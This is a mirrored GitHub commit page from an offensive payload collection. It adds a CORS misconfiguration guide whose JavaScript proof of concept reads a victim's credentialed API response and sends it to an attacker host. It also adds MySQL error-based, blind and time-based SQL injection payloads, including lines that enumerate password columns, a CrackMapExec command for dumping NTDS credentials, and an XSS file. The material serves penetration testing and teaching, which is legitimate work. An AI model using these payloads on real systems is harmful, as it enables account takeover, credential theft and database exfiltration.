mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
CORS Misconfiguration
This commit is contained in:
parent
b6697d8595
commit
4a176615fe
@ -219,4 +219,5 @@ pip install -r requirements.txt
|
||||
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
|
||||
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
|
||||
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
|
||||
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
|
||||
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
|
||||
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
|
90
CORS Misconfiguration/README.md
Normal file
90
CORS Misconfiguration/README.md
Normal file
@ -0,0 +1,90 @@
|
||||
# CORS Misconfiguration
|
||||
|
||||
> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Prerequisites](#prerequisites)
|
||||
* [Exploitation](#exploitation)
|
||||
* [References](#references)
|
||||
|
||||
## Prerequisites
|
||||
|
||||
* BURP HEADER> `Origin: https://evil.com`
|
||||
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
||||
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com`
|
||||
|
||||
## Exploitation
|
||||
|
||||
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
||||
|
||||
### Vulnerable example
|
||||
|
||||
```powershell
|
||||
GET /endpoint HTTP/1.1
|
||||
Host: victim.example.com
|
||||
Origin: https://evil.com
|
||||
Cookie: sessionid=...
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Access-Control-Allow-Origin: https://evil.com
|
||||
Access-Control-Allow-Credentials: true
|
||||
|
||||
{"[private API key]"}
|
||||
```
|
||||
|
||||
### Proof of concept
|
||||
|
||||
```js
|
||||
var req = new XMLHttpRequest();
|
||||
req.onload = reqListener;
|
||||
req.open('get','https://victim.example.com/endpoint',true);
|
||||
req.withCredentials = true;
|
||||
req.send();
|
||||
|
||||
function reqListener() {
|
||||
location='//atttacker.net/log?key='+this.responseText;
|
||||
};
|
||||
```
|
||||
|
||||
or
|
||||
|
||||
```html
|
||||
<html>
|
||||
<body>
|
||||
<h2>CORS PoC</h2>
|
||||
<div id="demo">
|
||||
<button type="button" onclick="cors()">Exploit</button>
|
||||
</div>
|
||||
<script>
|
||||
function cors() {
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
if (this.readyState == 4 && this.status == 200) {
|
||||
document.getElementById("demo").innerHTML = alert(this.responseText);
|
||||
}
|
||||
};
|
||||
xhr.open("GET",
|
||||
"https://victim.example.com/endpoint", true);
|
||||
xhr.withCredentials = true;
|
||||
xhr.send();
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
## Bug Bounty reports
|
||||
|
||||
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
||||
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
|
||||
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
|
||||
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
|
||||
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
|
||||
|
||||
## References
|
||||
|
||||
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
|
||||
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||||
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
@ -375,6 +375,7 @@ CrackMapExec module
|
||||
|
||||
```powershell
|
||||
cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||
cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
|
||||
```
|
||||
|
||||
### Password in AD User comment
|
||||
|
@ -18,6 +18,8 @@
|
||||
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
|
||||
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
||||
* [MYSQL Time Based](#mysql-time-based)
|
||||
* [Using SLEEP in a subselect](#using-asleep-in-a-subselect)
|
||||
* [Using conditional statements](#using-conditional-statements)
|
||||
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
||||
* [MYSQL Current queries](#mysql-current-queries)
|
||||
* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
|
||||
@ -148,11 +150,11 @@ Shorter to read:
|
||||
Works with `MySQL >= 5.1`
|
||||
|
||||
```sql
|
||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||
?id=1 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
|
||||
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||
```
|
||||
|
||||
## MYSQL Blind
|
||||
@ -165,6 +167,8 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
|
||||
?id=1 and left(version(),1)=4
|
||||
?id=1 and ascii(lower(substr(Version(),1,1)))=51
|
||||
?id=1 and (select mid(version(),1,1)=4)
|
||||
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
|
||||
?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
|
||||
```
|
||||
|
||||
### MYSQL Blind using a conditional statement
|
||||
@ -204,17 +208,42 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
|
||||
|
||||
## MYSQL Time Based
|
||||
|
||||
The following SQL codes will delay the output from MySQL.
|
||||
|
||||
```sql
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||
|
||||
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
|
||||
RLIKE SLEEP([SLEEPTIME])
|
||||
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||
```
|
||||
|
||||
?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
|
||||
?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
|
||||
### Using SLEEP in a subselect
|
||||
|
||||
```powershell
|
||||
1 and (select sleep(10) from dual where database() like '%')#
|
||||
1 and (select sleep(10) from dual where database() like '___')#
|
||||
1 and (select sleep(10) from dual where database() like '____')#
|
||||
1 and (select sleep(10) from dual where database() like '_____')#
|
||||
1 and (select sleep(10) from dual where database() like 'a____')#
|
||||
...
|
||||
1 and (select sleep(10) from dual where database() like 's____')#
|
||||
1 and (select sleep(10) from dual where database() like 'sa___')#
|
||||
...
|
||||
1 and (select sleep(10) from dual where database() like 'sw___')#
|
||||
1 and (select sleep(10) from dual where database() like 'swa__')#
|
||||
1 and (select sleep(10) from dual where database() like 'swb__')#
|
||||
1 and (select sleep(10) from dual where database() like 'swi__')#
|
||||
...
|
||||
1 and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')#
|
||||
```
|
||||
|
||||
### Using conditional statements
|
||||
|
||||
```sql
|
||||
?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
|
||||
?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
|
||||
?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||
```
|
||||
|
||||
## MYSQL DIOS - Dump in One Shot
|
||||
@ -324,4 +353,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
|
||||
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
|
||||
- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
|
||||
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
|
||||
- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
|
||||
- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
|
||||
- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)
|
@ -2,8 +2,6 @@
|
||||
|
||||
> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
|
||||
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
|
File diff suppressed because it is too large
Load Diff
3
XSS Injection/Files/xss.url.url
Normal file
3
XSS Injection/Files/xss.url.url
Normal file
@ -0,0 +1,3 @@
|
||||
<html>
|
||||
<script>alert(document.domain)</script>
|
||||
</html>
|
Loading…
Reference in New Issue
Block a user